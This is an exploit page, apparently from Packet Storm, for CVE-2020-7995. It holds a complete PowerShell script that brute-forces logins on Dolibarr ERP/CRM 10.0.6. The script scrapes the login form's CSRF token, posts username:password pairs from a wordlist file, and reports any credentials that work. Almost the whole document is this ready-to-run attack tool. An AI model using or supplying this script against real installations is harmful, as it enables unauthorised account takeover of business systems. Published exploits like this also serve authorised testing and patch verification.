Dolibarr ERP/CRM version 10.0.6 login brute forcing exploit.
63a36f93b7d48318d5fd0616171ef949e346e86520318ffb5ac3b55db0707dba# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995
function brute($url,$username,$passwd){
try{
$WebResponse = Invoke-WebRequest $url
$a=$WebResponse.Forms.fields
$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
if($WebResponse1.Forms.Id -ne "login"){
Write-Host "username password is match"
Write-Warning "user: $username ,passwoed: $passwd"
return $true
}
}catch{
Write-Warning "Something Wrong!"
}
}
function fileinput($filepath,$url){
try{
Write-Host "Target: $url"
$fp=Get-Content -Path $filepath
foreach($line in $fp){
$s=$line -split ':'
$username=$s[0]
$passwd=$s[1]
Write-Host "[+] Check $username : $passwd"
$bf=brute $url $username $passwd
if($bf -eq $True){
break
}
}
}catch{
Write-Warning "File is error"
}
}
$textart=@'
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\
| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|
| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/
\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/
'@
Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed